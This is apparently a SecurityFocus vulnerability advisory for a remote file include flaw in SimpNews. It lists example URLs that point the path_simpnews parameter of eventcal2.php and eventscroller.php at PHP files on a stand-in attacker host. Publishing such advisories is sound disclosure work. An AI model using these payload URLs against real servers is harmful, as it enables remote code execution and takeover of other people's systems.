SimpNews PATH_SIMPNEWS Remote File Include Vulnerability

The following examples have been provided:

http://www.example.com/eventcal2.php.php?path_simpnews=
with
http://www.attacker.com/config.php
http://www.attacker.com/functions.php
http://www.attacker.com/includes/has_entries.inc
or
http://www.example.com/eventscroller.php?path_simpnews=
with
http://www.attacker.com/config.php
http://www.attacker.com/functions.php


 

Privacy Statement
Copyright 2010, SecurityFocus